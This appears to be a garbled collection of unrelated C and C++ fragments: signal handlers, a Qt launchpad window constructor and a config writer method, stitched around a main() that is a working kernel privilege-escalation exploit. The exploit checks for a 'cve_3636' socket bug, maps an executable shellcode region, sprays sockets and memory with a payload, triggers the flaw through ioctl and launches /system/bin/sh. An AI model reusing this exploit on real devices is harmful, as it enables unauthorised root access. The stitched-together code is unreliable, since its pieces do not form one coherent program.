static void abrt_handler(int sig)
{
syslog(LOG_ERR, "sigabrt received");
if (client != NULL)
close_child(false);
syslog_close();
_exit(1);
}
static void term_handler(int sig)
{
syslog(LOG_NOTICE, "sigterm received");
if (client != NULL) {
client_quit();
close_child(true);
syslog_close();
_exit(1);
} else {
terminate = true;
}
}
Qt_launchpad::Qt_launchpad(unsigned long initial_quota, QWidget *parent)
: QMainWindow(parent), Launchpad(initial_quota)
{
setupUi(this);
// disable minimize and maximize buttons
Qt::WindowFlags flags = windowFlags();
flags &= ((~Qt::WindowMinMaxButtonsHint)|(Qt::WindowStaysOnTopHint));
setWindowFlags(flags);
// To trigger lastWindowClosed()
setAttribute(Qt::WA_QuitOnClose, true);
launcherDockWidgetContents = new QToolBox();
// put a QScrollArea into launcherDockWidget for scrolling of launcher entries
/*QScrollArea *launcherScrollArea = new QScrollArea;
launcherScrollArea->setFrameStyle(QFrame::NoFrame);
launcherScrollArea->setWidget(launcherDockWidgetContents);*/
launcherDockWidget->setWidget(launcherDockWidgetContents);
launcherDockWidget->setFont(QFont("OS5",12,QFont::Bold));
// put a QScrollArea into childrenDockWidget for scrolling of child entries
QScrollArea *childrenScrollArea = new QScrollArea;
childrenScrollArea->setFrameStyle(QFrame::NoFrame);
childrenScrollArea->setWidget(childrenDockWidgetContents);
childrenDockWidget->setWidget(childrenScrollArea);
childrenDockWidget->setFont(QFont("OS5",12,QFont::Bold));
QVBoxLayout *childrenDockWidgetLayout = new QVBoxLayout;
childrenDockWidgetLayout->setContentsMargins(0, 0, 0, 0);
childrenDockWidgetLayout->setSpacing(0);
childrenDockWidgetLayout->setAlignment(Qt::AlignTop);
childrenDockWidgetContents->setLayout(childrenDockWidgetLayout);
childrenDockWidget->hide();
statusDockWidget->hide();
QObject::connect(childrenDockWidget,SIGNAL(topLevelChanged(bool)),this,SLOT(enlarge_childrenDockWg(bool)));
QObject::connect(statusDockWidget,SIGNAL(topLevelChanged(bool)),this,SLOT(enlarge_statusDockWg(bool)));
// update the available quota bar every 200ms
QTimer *avail_quota_timer = new QTimer(this);
connect(avail_quota_timer, SIGNAL(timeout()), this, SLOT(avail_quota_update()));
avail_quota_timer->start(200);
Middle* middle=new Middle();
QObject::connect(middle,SIGNAL(quit_child()),this,SLOT(close_child()));
QObject::connect(this,SIGNAL(unlock_child()),middle,SLOT(unlock()));
middle->start();
}
int main()
{
int *socks;
unsigned long *address[MAX_MMAP];
int pid[MAX_CHILD];
int pipe_read[MAX_CHILD];
void *addr;
int max_fds;
int i, num_socks, num_child;
int j;
int success, count;
int fd;
int vulnerable = 0;
int child_socks, total_child_socks;
int temp;
unsigned long *target;
addr = mmap((void*)0x200000, _PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
if (addr == MAP_FAILED) {
printf("map failed!\n");
return -1;
}
memset((void*)0x200000, 0, _PAGE_SIZE);
protect_from_oom_killer();
fd = create_icmp_socket();
if (fd < 0) {
printf("can not crate icmp socket!\n");
return -1;
}
setup_vul_socket(fd);
for (i = 0; i < _PAGE_SIZE / sizeof(int *); i++) {
if (((unsigned int*)addr)[i] != 0) {
vulnerable = 1;
break;
}
}
if (vulnerable == 0) {
printf("cve_3636 not vulnerable!\n");
return -1;
}
if (mmap(0x50000000, 0x4000, PROT_WRITE | PROT_READ | PROT_EXEC,
MAP_SHARED | MAP_ANONYMOUS | MAP_FIXED, -1, 0) != 0x50000000) {
printf("map shellcode area failed!\n");
return -1;
}
for (i = 0; i < 0x4000; i += 4){
target = 0x50000000 + i;
*target = call_back;
}
my_pid = getpid();
max_fds = maximize_fd_limit();
printf("max_fds = %d\n", max_fds);
socks = malloc(sizeof(int*) * (max_fds + 1));
printf("create child to spray\n");
num_child = 0;
num_socks = 0;
child_socks = 0;
total_child_socks = 0;
for (i = 0; i < MAX_CHILD; i++) {
if (total_child_socks > MAX_SOCKS)
break;
pid[i] = create_child(&pipe_read[i], max_fds, &child_socks);
if (pid[i] == -1)
break;
printf(".");
fflush(stdout);
//printf("create vulnerable socket!\n");
total_child_socks += child_socks;
//printf("\n now child sockets = %d\n", total_child_socks);
if ( num_socks < max_fds) {
socks[num_socks] = create_icmp_socket();
if (socks[num_socks] == -1)
break;
num_socks++;
}
usleep(500000);
}
num_child = i;
printf("total child sockets: %d\n", total_child_socks);
printf("\nchild num: %d\n", num_child);
socks[num_socks] = -1;
printf("vulnerable socket num: %d\n", num_socks);
printf("now close child socket!\n");
for (i = 0; i < num_child; i++) {
close_child(pid[i]);
}
printf("setup vulnerable socket!\n");
for (i = 0; i < num_socks; i++) {
setup_vul_socket(socks[i]);
}
printf("sparying ...\n");
success = 0;
while (1) {
count = 0;
for (i = 0; i < MAX_MMAP; i++) {
address[i] = mmap((void*)0, MAP_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_SHARED|MAP_ANONYMOUS, -1, 0);
if (address[i] == MAP_FAILED)
{
printf("map failed!\n");
break;
}
fill_payload(address[i], MAP_SIZE);
for (j = 0; socks[j] != -1; j++) {
if (get_sk(socks[j]) > 0) {
success = 1;
printf("get it!\n");
ioctl(socks[j], 0x5678, &temp);
break;
}
}
if (success)
break;
}
count = i;
if (success) {
printf("free %ld bytes\n", MAP_SIZE * (count - 1));
for (i = 0; i < count; i++) {
munmap(address[i], MAP_SIZE);
}
munmap(0x50000000, 0x4000);
system("/system/bin/sh");
break;
}
}
printf("main end!\n");
return 0;
}
void config_writer::write_child(const std::string &key, const config &cfg)
{
open_child(key);
::write(out_, cfg, level_);
close_child(key);
}
